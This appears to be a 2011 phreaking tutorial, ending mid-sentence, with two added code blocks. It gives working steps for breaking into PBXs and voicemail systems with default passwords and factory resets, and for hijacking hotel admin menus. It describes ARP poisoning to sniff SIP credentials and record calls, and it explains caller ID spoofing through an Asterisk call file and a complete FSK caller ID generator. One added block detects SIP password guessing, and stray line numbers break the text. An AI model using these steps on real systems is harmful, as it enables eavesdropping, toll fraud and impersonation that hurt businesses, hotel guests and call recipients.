MurderMouse

Phones & Tones: Second Edition

Nov 13th, 2011
| Phones & Tones: Second Edition |
----------------------------------
| by Murder Mouse |


Section 1: The Introduction
----------------------------

Greets and meets. Well, it's definitely been a while since my last tutorial,
and with a new decade upon us now is as great a time as ever for a much
needed update. Phreaking has definitely seen some changes since I wrote
the original release. Joybubbles is gone, VoIP is now the standard for
almost any PBX, and in most cities in the US payphones are just a memory.
In fact, as I'm writing this the FCC is already debating how to convert
the entire PSTN to VoIP. As decades come and go the landscape of telephony
is constantly changing, and with it so does phreaking. Whether the calls
are carried through tandems or routers (technically on landline it's both),
the drive to explore and understand this landscape will always keep
phreakers going. So it's in this spirit that I write this guide.

One thing I'd like to point out before I get started is that I have
decided to write this a little differently than my original release. I've
stripped away much of the technical detail in favor of keeping the guide
as simple and straightforward as possible. However, this means that I'm
writing this guide with the assumption that you, the reader, already have at
least a basic understanding of telecommunications. I've included some
links and suggestions near the end of this guide and I'd suggest you
check through them if you need to. So with all that said, let's begin.



Section 2: Exchange Scanning
-----------------------------

Well, as before, let's start this discussion off with an explanation of
exchange scanning. Exchange scanning, for those of you who don't know, is
simply picking up the phone and dialing down a range of phone numbers to
see what you come up with. This is how you will find all those interesting
numbers you can fuck with and share (voicemail systems, test numbers,
ANACs, strange recordings, etc). So how do you get started? Well, an
exchange, also known as the NXX, is the middle three digits in any phone
number (i.e. 555-xxx-1337). Most people when they first really get started
scan their own exchange, usually starting with the low end of the exchange
(i.e. NPA-NXX-00xx, NPA meaning the area code). So you would start off
dialing NPA-NXX-0000, write down what you hear, then move on to 0001,
0002, and so on and so forth. If you're the paranoid type you might want
to randomize your call sequence in order to make it slightly less obvious
what you've been up to, as in go from 0000 to 0021 to 0076 to 0014, etc
until you've scanned the first 100 numbers on the exchange. This of course
is entirely up to you, and at least in the United States exchange scanning
is legal in most areas (I think I remember reading about a law in
Connecticut concerning this but I'm not really sure on that). So anyways,
when scanning you will probably want to make a list for yourself of the
results for later review or to share. It's best to make some legends
(acronyms) for yourself in order to abbreviate some of the most common
finds while you're scanning. Provided below is the list I use for all of
mine, which is partly based on the standard proposed on binrev a couple of
years back:

CC - Cannot be completed
CR - Cannot be reached from your calling area
NS - Not in Service
D - Disconnected
CB - All circuits busy
RO - Reorder
B - Busy
FX - Fax machine
R - Rings
HELO - Hello?
VM - Voicemail
VMS - Voicemail System

Of course you're free to use whatever legends you like, but just be sure
you leave a list of them at the top of your exchange scans if you plan on
sharing them with anyone. If you need some examples to go on you can check
out some of Information Leak's exchange scans below:

www.informationleak.org/viewforum.php?f=43

Anyways, it's best to scan during different times of the day depending on
what kind of exchange scan you are doing. For local exchange scans or any
scans that involve the probability of hitting a lot of residential lines
it's best to scan anywhere from mid-morning to mid-afternoon if you can.
This is because most people will be up and out of the house (work, school,
whatever). Of course any time that doesn't involve interrupting people's
much needed sleep will work just fine. On the other hand, if you're doing a
toll free scan (1-800, 866, etc) or scanning a range assigned to a
specific PBX (more on this later) then you'll want to scan in the middle
of the night (after business hours).

So with all that said I'll close this section as I did last time by
helping you identify some of the sounds you'll be coming across while
scanning:

Fax Machines - No need to tell you what a fax machine is, but you'll come
across many of them while scanning and being able to pick out their tones
can be important. Most fax machines you'll come across will have a modem
sound (like the sound a modem makes when using dialup), but with a
slightly flatter sounding series of tones. It's kind of hard to describe,
but once you hear it it's easy to notice. Of course some other fax
machines have completely different tones. Some have a low pulsing tone,
and some others have a much more drawn out series of tones than most.
You'll hear all of them as you're scanning so it's a good idea to get
familiarized with these tones early on.

Milliwatt Test Numbers - These are one of the most common test numbers,
and you'll be painfully aware of what they are when you stumble across
one, literally. The tone is a very loud, consistent tone.

ANACs - These are very common numbers to come across, but if you're not
paying attention to the recordings you are stumbling across you can easily
miss them. These are especially common during toll free scans due to how
many business recordings will read off the ANI (and in some extremely rare
cases even include the ANI II identifier; feel privileged if you manage to
snag a number like this). On the other hand, the ANACs that line
technicians use are pretty easy to discern since the recording will just
immediately read off the ANI. All I can tell you is pay attention.

DISAs - These are the administrative lines for analog PBXs and needless to
say are a lot less common to come across than they were just a few years
ago. This, as I said in the introduction, is because most businesses,
departments, etc have upgraded their PBXs to VoIP systems. If you do come
across these though you will recognize them in a wide variety of ways.
Some of the older analog systems have a lower, consistent tone upon
connecting, but I haven't really heard these anytime I scan. Most of the
analog PBXs still up and kicking will pick up with either complete silence
(meaning it's waiting for DTMF input) or a dial tone. Of course there are
some other types of systems besides DISAs that may sit and wait for DTMF,
but commonly the login process is still the same regardless.

DATUs - These are one of the best finds you can come across, but I'm not
really sure how common of a find they are these days since DATUs have
never really been a part of the telco here. Before AT&T bought the area
out, BellSouth was using VoiceSystems, which functioned just like
DATUs but required a specific modem in order to access the prompt
(otherwise it would just hang up as soon as you called it up). Either way
these are administrative lines used by line technicians for basic repair
and tests on subscriber lines within a given exchange, and you'll
recognize one as a half ring followed by a low tone. I'll link some
information on it later in the guide.

VMBs - Of course by VMBs I don't mean the individual mailboxes you'll come
across when scanning PBXs and such, but specifically the voicemail system
lines for logging in and checking messages and such on the mailboxes. Just
like ANACs, to fish these out you have to really just pay attention to any
recordings you come across. Some voicemail systems will announce what kind
of system it is as soon as you connect, while others will just go straight
to asking for your user id. What to do from here will be discussed in a
later section.

Also, once you get a handle on exchange scanning you should look into
unpublished exchanges. Most of these are the exchange numbers you normally
dial to reach common services (411, 911, 211, etc), but depending on the
LEC there may also be a telco exchange used just for test numbers (like
959 in the AT&T areas). To get unpublished exchanges just go to nanpa.com
and look for Central Office Code Assignments that are close to your area
(remember, Utilized means used). Compare this list to the list in your
phone book, and any exchanges that aren't listed in the phone book besides
the obvious services mentioned before can be considered special interest
exchanges. Finally, before I finish here I should mention that if
handscanning seems too daunting for you and you really want to go the
wardialer route (to each their own) and you're a Linux user then I'd
suggest looking into iWar. It has plenty of nifty options, including support
for protocols like IAX2. Check the link below for details:

www.softwink.com/iwar/



Section 3: Hacking PBXs
------------------------

Well, now that we're done with exchange scanning we can move on to PBXs.
How you will go about exploring, exploiting, fondling, or whatever you
feel like doing with a PBX varies greatly depending on the kind of PBX it
is, but a great place to start either way is to do a little poking around
on the phone. First crack open the phone book or go over to superpages.com
and look up any business/department/etc you have in mind to see all the
listed numbers for that organization. Some of the larger businesses in
your area may have a range of numbers reserved. If so, you will see that
all of the listed numbers are basically the same. Say the main office line
is NPA-NXX-5500, their fax line is NPA-NXX-5504, and their accounting
department is NPA-NXX-5542. Then it's safe to assume that a great place to
start is to scan the NPA-NXX-55xx range. Take note of all the numbers
listed and start exchange scanning down the rest to see what you come
across. Otherwise, if there isn't a range to scan, try calling the main line
(after business hours of course) and listen through the recording.
Sometimes the recording will go through a list of extensions for different
departments that the caller might be inquiring about. Listening through
this gives you the opportunity to figure out the extension range, which
you can then scan through like you would an exchange scan. Say the main
office is 10, the accounting department is 15, senior manager is 22, and
so on and so forth; then it's safe to assume that the range goes anywhere
between 10 and 99. So just like an exchange scan you would take note of all
the extensions listed, and then just keep calling back and trying all the
extensions that weren't mentioned. Most of the interesting extensions that
you'll come across will be at the end of the range (50, 99, 9999, wherever
the extension range ends) since all the office/department lines are going
to be assigned from the start on up. If all you're after is the voicemail
system (more on these later) then you can cut short how many times you
have to call back by scanning up in 10s. Say the main office line is 10,
then you can start at 20 and just keep going up until you find what you
were looking for. Otherwise, trying them all will at the very least, as
would an exchange scan, give you a decent idea of what kind of PBX you are
dealing with. Say you hear a lot of Audix mailbox recordings; then you are
dealing with an Avaya PBX (which is a very popular VoIP PBX). Just at the
very least listen out for anything that could help you identify what
exactly you're up against, and use Google to do a little bit of homework
on it. User guides, installation manuals, any of the vendor sites can give
you a plethora of information that you can use later on (default
passwords, etc).

So let's say for starters that you're scanning an analog PBX and happen to
come across a DISA line. Well, from here you would try guessing the
passcode and seeing if you get lucky. Try combinations like 9999#, 1234#,
etc and if you catch a dial tone then consider yourself lucky and use it
however you like (dial out, fuck around with it a little, whatever). Of
course a more likely scenario when scanning is that you don't find a DISA
line, but instead cop enough recordings to figure out what kind of VoIP
PBX you're dealing with and get all the information you need on it (Avaya,
Shoretel, etc). Well, then you'd pack up your laptop with a softphone like
X-Lite downloaded (in case you want to dial out), get over around the
business you're targeting (during business hours), and see if there are
any wireless access points you can use. How to crack the key if it's
protected is beyond the scope of this tutorial so let's just say for shits
and giggles that there is an AP and it's unprotected. Well, a good start
from here would be to start scanning the network for SIP servers. The port
for these is 5060 on either UDP or TCP, so in nmap you would scan for
these with the following:

nmap -sU -p 5060 192.168.1.1-254

Another, more thorough, option for Windows users is to download SiVuS and
scan the network that way. SiVuS has an entire suite of tools that you can
use in order to enumerate any information you can, and attempt some common
hacks against the server (REGISTER attempts, all that good stuff). Link
provided below:

www.vopsecurity.org

Also, while I'm giving program suggestions, I would also recommend checking
out SIPVicious, which is a series of Python scripts that can be used for
scanning, enumerating, and cracking SIP proxies and servers on the
network.

http://sipvicious.org/blog/

So let's say that of the three you decide to use SiVuS to scan for any weak
points in the network. You will first want to see if you can find any SIP
servers. First go to SIP Component Discovery and in the "Target network"
field enter something like 192.168.1.1-254 (whatever the network range is)
and then click Scan. Let this play through and see if you find any SIP
servers. If you do, you can now scan the SIP server for any common attacks.
Just go to the SIP Scanner tab, and click on Scanner Configuration. Enter
the SIP server you found before and check "Probe Targets". From here you
can also configure other aspects like what sort of authentication to use
(most SIP servers use MD5, but cleartext still isn't completely out of the
question), what sort of method checks to use, security checks, log file to
save, and other aspects of the scan. Then just click over to the Scanner
Control Panel tab and initiate the scan. Now what you can do from here
depends on what you come across while scanning the network, and what your
SIP server scan pulled. A great place to start if the scan didn't pull
anything useful in your case is to try and grab some usernames on the
server. To try this you have two options. You can either manually test
usernames with SiVuS, or use Cain & Abel to try and sniff usernames
over the network. To manually test possible usernames in SiVuS go to
Utilities/Message Generator and fill out the appropriate information. For
example, set Method to REGISTER, Called User to the user you are attempting
to get a response from, Domain Host to the IP or hostname of the SIP
server you discovered, change the To to usertotesthere
<sip:usertotesthere@sipserverhere.com> and From to whatever, and change
Subject and User Agent to make it less obvious on the network what exactly
you are doing. Then click Start and see what sort of response you get from
the server. A 401 response means you have a valid username, and 403 means
that it's an invalid username. A good scheme to use if you are somewhat
familiar with the business/department you are dealing with is to try the
names of employees who work there, for example the first name, first
initial and last name, first name and last initial, etc. This is a popular
scheme for a lot of places so it's definitely worth a try. Even if you
aren't familiar with the place you can try to take a casual visit into the
business/department and keep a mental note of any of the employee names
for future reference. Of course, depending on the network it can many times
be a pretty hefty task trying to test every possible username that way, so
let's get into sniffing over the network for possible usernames. For this,
like I said earlier, we will be using Cain & Abel, which can be downloaded
here:

www.oxid.it/cain.html

Now what we first have to do is establish an ARP poison route on the
network. To do so open up Cain & Abel and go to Configure. From here
select your network card and click OK. From here click the + sign, and
this will bring up the MAC Address Scanner. "All hosts in my subnet"
should be active so just press OK. Now click the + sign again and you
should see a list of hosts on the network on the left side. Click on the
IP of the SIP server and select all the IPs on the right side, then just
click OK. Now you can sniff all the usernames that pass over the server by
looking through the To, From, and Contact fields on everything that passes
through. Now from here, one way or another, you should have a decent list of
usernames to use, so now it's time to crack any of these users to get the
password. From here you have two routes to go with: passive and active
cracking. We'll first start off with active cracking. Open up SiVuS again
and go to Utilities/Authentication Analysis. Here you will see Realtime
Analysis on the left side of the window. Enter one of the users you found
in the Called User field, and the IP of the SIP server in Domain/Host.
Then enter the usernames and passwords files and press Start. A good
thing to go ahead and note is that a common password scheme is for the
pass to be the same as the username, or the telephone/extension number of
the user. So incorporating these into your password list would be a good
idea. Of course the problem with active cracking is that most SIP servers
will lock you out after 3 or so failed attempts, thus bringing us to our
second option: passive cracking. For this let's assume that you still have
Cain & Abel open from enumerating the usernames. From the Sniffer tab
click on the Passwords tab, and scroll down until you see SIP. From here
you should see some captured hashes, which you can then right click on and
select either dictionary or brute force. If you choose dictionary crack
just load the dictionary file the same way you would with an active crack,
and then on the right side you will see some options you can choose to use
with your dictionary file (reverse, double, numbered, etc). Brute force is
pretty straightforward, but not recommended.

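Everything the last two paragraphs lean on (a REGISTER for a guessed user answering 401 when the user exists and 403 when it doesn't, and a lockout after roughly three failed attempts) is also what the PBX owner can alert on from the server's own logs. The following is an added example and not code from the original paste; it assumes a constructed, generic log line format (a real SIP server logs differently, so only parse_line() would need adapting) and flags an enumeration sweep, password guessing, and a REGISTER that succeeds right after guessing, using constructed sample lines.

```python
"""Flag SIP REGISTER user enumeration and password guessing in server logs.

Added example for this section; it is not code from the original paste.
The log format is a constructed, generic one (one line per REGISTER the
server answered: timestamp, client IP, user from the To header, final
status). Real SIP servers log differently, so parse_line() is the part
to adapt. It keys on exactly the behaviour the text describes: 401 for a
known user, 403 for an unknown one, and a lockout after about 3 failures.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed line shape, e.g.:
# 2011-11-13T02:14:05Z src=10.0.0.23 method=REGISTER user=jsmith status=403
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) method=(?P<method>\S+) "
    r"user=(?P<user>\S+) status=(?P<status>\d{3})$"
)


def parse_line(line):
    """Return a dict for a well-formed REGISTER line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m or m.group("method") != "REGISTER":
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return {"ts": ts.replace(tzinfo=timezone.utc), "src": m.group("src"),
            "user": m.group("user"), "status": int(m.group("status"))}


def detect(lines, window_s=300, enum_users=5, guess_fails=3):
    """Return (src, kind, detail) alerts found in an iterable of log lines.

    enumeration - one source got 401/403 for >= enum_users distinct users
                  within window_s seconds (the 401-vs-403 oracle in use)
    guessing    - one source got >= guess_fails 401s for the same user within
                  window_s seconds (creeping up on the lockout threshold)
    compromise  - a source flagged for guessing then got a 200 for that user
    """
    events = sorted((e for e in map(parse_line, lines) if e),
                    key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        window = []            # this source's events inside the last window_s
        enum_flagged = False
        guessed = set()        # users already flagged for guessing from src
        for e in evs:
            window.append(e)
            while (e["ts"] - window[0]["ts"]).total_seconds() > window_s:
                window.pop(0)
            failed = [w for w in window if w["status"] in (401, 403)]
            users = {w["user"] for w in failed}
            if not enum_flagged and len(users) >= enum_users:
                alerts.append((src, "enumeration",
                               f"{len(users)} distinct users probed in {window_s}s"))
                enum_flagged = True
            if e["status"] == 401 and e["user"] not in guessed:
                n = sum(1 for w in failed
                        if w["user"] == e["user"] and w["status"] == 401)
                if n >= guess_fails:
                    alerts.append((src, "guessing",
                                   f"{n} failed REGISTERs for {e['user']}"))
                    guessed.add(e["user"])
            elif e["status"] == 200 and e["user"] in guessed:
                alerts.append((src, "compromise",
                               f"REGISTER for {e['user']} succeeded after guessing"))
    return alerts


# Constructed sample: 10.0.0.50 is a normal phone (one 401 challenge, then
# 200); 10.0.0.23 sweeps name-scheme guesses, then hammers the one user that
# answered 401 until a REGISTER goes through.
SAMPLE_LOG = """\
2011-11-13T02:00:01Z src=10.0.0.50 method=REGISTER user=reception status=401
2011-11-13T02:00:02Z src=10.0.0.50 method=REGISTER user=reception status=200
2011-11-13T02:14:05Z src=10.0.0.23 method=REGISTER user=jsmith status=401
2011-11-13T02:14:06Z src=10.0.0.23 method=REGISTER user=j.smith status=403
2011-11-13T02:14:07Z src=10.0.0.23 method=REGISTER user=smithj status=403
2011-11-13T02:14:08Z src=10.0.0.23 method=REGISTER user=mjones status=401
2011-11-13T02:14:09Z src=10.0.0.23 method=REGISTER user=m.jones status=403
2011-11-13T02:20:00Z src=10.0.0.23 method=REGISTER user=jsmith status=401
2011-11-13T02:20:01Z src=10.0.0.23 method=REGISTER user=jsmith status=401
2011-11-13T02:20:02Z src=10.0.0.23 method=REGISTER user=jsmith status=401
2011-11-13T02:20:03Z src=10.0.0.23 method=REGISTER user=jsmith status=200
2011-11-13T02:20:04Z src=10.0.0.50 method=REGISTER user=reception status=401
not a log line at all
"""


if __name__ == "__main__":
    for src, kind, detail in detect(SAMPLE_LOG.splitlines()):
        print(f"{src:12} {kind:12} {detail}")
```

The thresholds are deliberately conservative so a normal phone that re-registers after a 401 challenge never trips them; tune window_s and guess_fails to match the lockout policy actually configured on the server.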
You can also, if you like, while messing around with Cain & Abel use it to
capture and listen in on conversations going over the LAN. To do this just
establish an ARP poison route as you did before when sniffing out
usernames, but instead of clicking on the SIP server just highlight all
the hosts on the network, and any host connected to them. Then when you
have the sniffer going after this just go to the VoIP tab from the Sniffer
tab, and let that run for a while. That is basically it; from here Cain &
Abel will start capturing, encoding, and recording any conversations going
across the LAN. There are endless other vulnerabilities you can use
related to the hard phones used, the software used (IAX vulns abound),
etc. However, for the sake of sanity I'm going to cut this section here and
leave it to you to look into anything else you may want to try against the
PBX.



Section 4: Hacking Voicemail Systems
-------------------------------------

Well, now that we're finished discussing PBXs let's move on to VMBs. In the
original release of Phones & Tones I basically slacked through it by
linking up some tutorials from oldskoolphreak. Unfortunately most of the
VMB hack tutorials floating around nowadays are pretty dated so I couldn't
really slack through this section even if I wanted to. The methods are
pretty much the same as ever, except that some voicemail systems popular
these days (Audix for example) have no system account accessible through a
TUI. This means for these you have to be on the LAN itself to access any
administrative functions.

Let's start with Audix. This is by far one of the most popular voicemail
systems, and is used on Avaya PBXs. As mentioned before, the
administrative functions themselves are handled on a server within the
LAN, which is unavailable outside the LAN. However, you can remotely try to
break into individual mailboxes. Just dial in, and as the announcement is
playing hit # to access the login. While default passwords are determined
by the administrator there are some common schemes you can try. Passes can
be any length between 1 and 15 digits, but most will be between 4 and 15.
Some common passes to try are passes like 111111, 123456, the phone number
of the mailbox (or the last 5 digits), etc. Just hit # again after entering
the pass attempt and if you are successful you can hit 4 to review messages
stored or hit 3 to record a new greeting.

Now let's move on to Merlin Mail. Unlike Audix, Merlin does have a system
administrative box for you to use. In order to access this from the main
line hit 9997#. From here you will be prompted to enter a pass. The
default pass from here depends on the version being used. For versions 1
and 2 the default pass is 1234#, and for version 3 it's 123456#. The good
thing about these is even if the default passes don't work you can reset
the system to default (if you're feeling that malicious). Just hit 2537
(CLER), and you should hear a "goodbye", which will then disconnect you.
Just call back to the system and then punch in the default pass to access
the system admin box. Now from here you can hit 9 to access the
administrative functions. In versions 1 and 2 it goes straight to these
options upon selecting, while with version 3 it will prompt you for a
second login (the default pass is 654321#). From there just sift through
the options and take your pick.

Another popular voicemail system is PartnerMail VS. This one is actually
very insecure in my opinion and I have no clue why it's so popular on
business PBXs. The problem for one is that the pass limit is 4 digits.
That's it, 4 digits and under is all anyone has to work with. The system
admin box is 99, and the default pass for these is 1234. Unlike other
systems (Audix and CallPilot for example) the system doesn't force anyone
to change the default pass so there is definitely a stronger chance that
even the system admin account might still be set at default. Though even
if not you can still try other combinations (4321, 1111, 2580, etc). From
here you can create a mailbox for yourself on the system by hitting 4. The
system will read back what mailbox numbers are available, and prompt you
to enter one in. Just enter one that isn't used (preferably on the
higher end of the range) and hit # to confirm your choice. Of course even
if you can't access the admin box to create your own mailbox you can try
to break into any of the other mailboxes on the system. They all have the
same default pass, and if that doesn't work you can try the combinations
mentioned before or the extension/mailbox number of the user.

Now that we're done with that let's move on to Cisco Unity VMBs. These are
popular on a lot of college campuses (as are Cisco SIP hardphones, and
basically anything Cisco). For these, as soon as you reach the main line
you would hit *, and enter the ID of the mailbox. This would be the phone
number of the user, and the pass that follows by default would be the same
as the ID. If this doesn't work you can try the same combinations as
always (1234567, 7654321, 1111111, 1235789, etc). If you manage to guess
the right pass, from here you can hit 1 to listen to any messages, 3 1 to
listen to any saved messages, and 4 1 to change the VMB greeting.

So now that we've gone over campus VMBs let's move on to hotels. A popular
system that many hotels use is DuVoice. Now the beautiful thing about
playing around with a system like this is how integrated it is with the
hotel operations, as you'll find out. First let's go over the voicemail
system itself. Now from here there are two accounts that are going to be
of interest to you. 0 is the operator mailbox, and 991 is the greeting
box. This greeting box is used for recording greetings on the system for
the following day. The default pass for these is * 1234. Even if the
default has been changed the pass should still be in the 4 digit range so
treat it as you would a PartnerMail VS system. However, this isn't even the
half of this story. DuVoice also has DuVoice Hospitality. This is the
system used to give out temporary mailboxes for their guests to use, which
is integrated into an administrative TUI. To access this from the main
line hit **97. Now there are a few levels of access you can use, rated
from basic to expert. For our interests it's best to go with expert. The
default pass for this is 7890#. From here you have 3 options: automatic
wakeup call, re-record hospitality prompts, and guest room administration.
In case you want to be a dick and set someone up for an impromptu wakeup
call select 1, enter the mailbox number, enter the hour (00-23, military
time), enter the minute (00-59), then it'll ask you if the hour is between
1-12. So then after that prompt you'll select 1 for am, or 2 for pm. Then
press 1 to accept, and then set the day for the wakeup call: 1 for today,
2 for tomorrow, and press 3 to set the date. If you decide to spare the
guests you can also go in and re-record the prompts by selecting 2 from
the main TUI menu. From here you can press 1 to re-record the wakeup
message, 2 for the wakeup announcement, 3 for the manager's welcome
message, 4 for the text message notification, and 5 for the default
greeting. From any of these it should play the current message. You can
from here hit 1 to accept, 2 to re-record (press # when done), 3 to
delete, and 4 restores the original. Finally, for guest room administration
press 3 from the main TUI. From here you have three options: 1 to check
in, 2 to check out, and 3 to move. From any of these it will prompt you to
enter the mailbox number followed by the # sign.

There are definitely other voicemail systems that I could cover, but I'm
going to cut it short here. There is Mitel, whose mailboxes have a
default password of 1234 (and a LAN HTTP server for configuration,
http://192.168.215.1:8180 by default). CallPilot mailboxes you would treat
like Audix; both are fairly secure compared to some other voicemail
systems. By far the most secure I think is IP Office. By default it
doesn't have any means of remote administration, and the configurations
can only be accessed via the user's extension (not exactly impossible, but
a lot of effort for just one VMB). With everything else you stumble across
just do your homework, Google what you can, and see what you can find on
it.



Section 5: ANI Spoofing
------------------------

Well, as before, let's move on to ANI spoofing. ANI, as you should know, is
the way in which you as the calling party are identified over the PSTN. This
is of course completely separate from the CPN (caller ID), which is on an
entirely separate channel. When ANI spoofing was first being popularized
by Lucky225 it was as simple as picking the right operator (one that
didn't forward ANI), and having them forward the call to its destination.
Nowadays of course any op is going to be able to forward ANI; however,
there are still plenty of toll free termination providers you can use.
Before getting into that I'll first, as before, go over the list of
ANI II assignments. These are the two digits preceding the ANI that help
identify the type of call that is being placed. Linked below is a list of
the assignments used:

http://www.nanpa.com/number_resource_info/ani_ii_assignments.html

I'm going to first start off with Google Voice. Google Voice of course has
a lot of options, and if you can cop an invite I would suggest getting an
account yourself. One of these features is an outgoing call feature. Now
while this normally will pass your CPN, you can use *67 before you call up
your GV number in order to pull an ANI spoof. You can use this to dial any
toll free number, or call 800-CALL-ATT or something in order to op divert
to another number. Of course I'm not sure how long this will last (credits
to JmanA9 for bringing this up on binrev) so try not to do anything too
stupid with this. If however you don't have a GV account or this trick no
longer works by the time you read this, you can try some toll free
termination numbers to try the same thing. Check the list below for
details:

http://www.voip-info.org/wiki/view/Toll+Free+Termination+Providers



  489.  
  490. Section 6: CPN Spoofing
  491. ------------------------
  492.  
So let's move on from ANI to CPN spoofing. This is of course a bit more
useless than ANI spoofing, and is really just something to play around
with for shits and giggles. It won't keep your call anonymous, since your
ANI is still carried over: the carriers still record it and any toll free
number you call still gets it delivered. The first tip I really have is
using SOB Caller ID Generator, which can be downloaded below..

http://www.artofhacking.com/orange.htm

Now it does have instructions on the download page and in the help file,
but the use of this program is pretty straightforward. You can click
Format to select the standard you will use. Standard is the on-hook (Type
I) burst that normally goes out between the first and second ring, so it
only makes sense if you are hooking this up to a line you control in
order to spoof the CPN directly on your own CPE. For a call that has
already been answered you want the Call Waiting (Type II, CIDCW) format.
So just punch in the name and number you wish to display, plug a pair of
headphones into the speaker port on your computer, call the landline you
want, and any time after the person has picked up (the far end's phone
only listens for the CAS alert tone while it is off hook, so there is
nothing to receive it before they answer) hold the headphones against the
mouthpiece and press Play to send over the spoofed CPN info. Strictly, a
Type II phone is supposed to answer the CAS tone with a DTMF ACK before
the FSK data is sent; the tool just plays CAS and then the data, so how
well this works depends on how lenient the receiving phone's decoder is.
Of course all of this and anything else that relies on in-band tones will
be outdated whenever the FCC successfully converts the entire PSTN over to
voip, but for now this works just fine in the US (the tones and formats
vary greatly in other countries). There are however plenty of other ways
to spoof your caller ID which are far more effective. The best way to
spoof caller ID is to use asterisk, which can be downloaded below..

www.asterisk.org/downloads

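Before moving on to asterisk, here is what the tones a caller ID generator
plays into the handset actually carry. This is an added example written
for this edit, not code from the guide or from SOB Caller ID Generator.
build_mdmf() packs a Telcordia-style MDMF (Multiple Data Message Format)
caller ID message with date/time, number and name parameters and the
checksum, parse_mdmf() checks it the way a receiving phone does, and
fsk_wav() modulates it as Bell 202 FSK (1200 baud, mark 1200 Hz, space
2200 Hz) into a WAV file you could play exactly as the guide describes.
The preamble lengths are parameters because the formats differ: the
on-hook Type I burst is assumed to use 300 channel seizure bits plus 180
mark bits, and a Type II (CIDCW) burst is assumed to be sent after the
phone's ACK with a mark preamble only. The number, name and date below are
made up.

```python
"""Caller ID (MDMF) message builder and Bell 202 FSK modulator.

Added example; the constants follow the public MDMF / Bell 202 descriptions
and the sample number, name and date are constructed, not real.
"""
import math
import struct
import wave

MDMF_TYPE = 0x80          # message type byte for MDMF
PARAM_DATETIME = 0x01     # MMDDHHMM
PARAM_NUMBER = 0x02       # calling line number
PARAM_NAME = 0x07         # calling name (up to 15 characters)

SAMPLE_RATE = 24000
BAUD = 1200
SAMPLES_PER_BIT = SAMPLE_RATE // BAUD   # 20 samples per bit, exact
MARK_HZ, SPACE_HZ = 1200, 2200


def build_mdmf(number, name, datetime_str="11132359"):
    """Return a complete MDMF message: type, length, parameters, checksum."""
    if not number.isdigit():
        raise ValueError("number must be digits only")
    if len(datetime_str) != 8 or not datetime_str.isdigit():
        raise ValueError("date/time must be MMDDHHMM")
    params = b""
    for ptype, value in ((PARAM_DATETIME, datetime_str),
                         (PARAM_NUMBER, number),
                         (PARAM_NAME, name[:15])):
        data = value.encode("ascii")
        params += bytes([ptype, len(data)]) + data
    body = bytes([MDMF_TYPE, len(params)]) + params
    # Checksum is the two's complement of the byte sum, so the whole
    # message (type, length, parameters, checksum) sums to 0 mod 256.
    return body + bytes([(-sum(body)) & 0xFF])


def parse_mdmf(msg):
    """Validate and unpack an MDMF message; a phone drops anything failing here."""
    if len(msg) < 3 or msg[0] != MDMF_TYPE:
        raise ValueError("not an MDMF message")
    if sum(msg) & 0xFF:
        raise ValueError("bad checksum")
    if msg[1] != len(msg) - 3:
        raise ValueError("length field does not match message")
    fields, i, end = {}, 2, 2 + msg[1]
    while i < end:
        ptype, plen = msg[i], msg[i + 1]
        fields[ptype] = msg[i + 2:i + 2 + plen].decode("ascii")
        i += 2 + plen
    return fields


def frame_bits(msg, seizure_bits=300, mark_bits=180):
    """Serial framing: channel seizure (0101...), mark, then each byte as
    a 0 start bit, eight data bits LSB first and a 1 stop bit."""
    bits = [i & 1 for i in range(seizure_bits)]
    bits += [1] * mark_bits
    for byte in msg:
        bits.append(0)
        bits += [(byte >> k) & 1 for k in range(8)]
        bits.append(1)
    return bits


def fsk_pcm(bits):
    """Phase-continuous Bell 202 FSK as 16-bit little-endian mono PCM."""
    phase, out = 0.0, bytearray()
    for bit in bits:
        step = 2 * math.pi * (MARK_HZ if bit else SPACE_HZ) / SAMPLE_RATE
        for _ in range(SAMPLES_PER_BIT):
            out += struct.pack("<h", int(20000 * math.sin(phase)))
            phase = (phase + step) % (2 * math.pi)
    return bytes(out)


def fsk_wav(path, msg, seizure_bits=300, mark_bits=180):
    """Write the modulated message to a WAV file; returns the bit count."""
    bits = frame_bits(msg, seizure_bits, mark_bits)
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(SAMPLE_RATE)
        w.writeframes(fsk_pcm(bits))
    return len(bits)


if __name__ == "__main__":
    # Constructed example: a Type II style burst with no channel seizure.
    message = build_mdmf("2125556798", "SPOOF TEST")
    print(parse_mdmf(message))
    print(fsk_wav("cid.wav", message, seizure_bits=0, mark_bits=80), "bits written")
```

The thing to notice is how little protects the display: the only integrity
check a phone performs is the 8-bit checksum, so anything that can get a
clean enough FSK burst onto the line after the CAS tone gets to choose
what the name and number fields say. The sample rate is 24 kHz so that a
bit is an exact 20 samples and the modulator stays phase continuous at the
bit boundaries, which is what cheap decoders are most sensitive to.
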
Asterisk is an open source voip PBX that you should really get familiar
with. I'll include some links around the end of this guide so you can
install and configure your asterisk setup. For now though let's talk about
how to use asterisk to spoof your CPN. Let's say you have asterisk
installed and have set up an account with a provider. From here you will
need to create the call file. This is what you will use to specify who you
are calling and the spoof number you are providing. Let's say for this
example that your number is NPA-NXX-1337, you are wanting to call
NPA-NXX-5148, and you want to spoof the number as NPA-NXX-6798. Just
create /tmp/spoof.call and insert the following...

Channel: IAX2/username:password@provideraddress.com/1NPANXX1337
CallerID: NPANXX6798
MaxRetries: 5
RetryTime: 60
WaitTime: 30
Context: spoofing
Extension: NPANXX5148
Priority: 1

The Context and Extension lines hand the answered call to your dialplan,
so extensions.conf needs a [spoofing] context with an extension matching
NPANXX5148 that Dial()s out through the same provider. Dial() inherits
the CallerID set in the call file, which is what puts the spoofed number
on the outbound leg.

Then login as root, start up asterisk, and run the following command..

mv /tmp/spoof.call /var/spool/asterisk/outgoing

Use mv rather than cp here: asterisk acts on the file the moment it shows
up in the spool, and a cp that is still in progress can get picked up
half written (mv is only atomic when /tmp and the spool are on the same
filesystem, so write the file somewhere under /var/spool/asterisk if they
aren't). Asterisk will detect the call file and call your number, then
when you answer dial the number you are wanting to call using the spoofed
caller ID you provided. I have to warn you of course that caller ID
spoofing is against the TOS for most voip providers, so don't try this
trick with providers that you are wanting to keep around. If Linux just
isn't your bag and you have the cash to burn then I have to at least
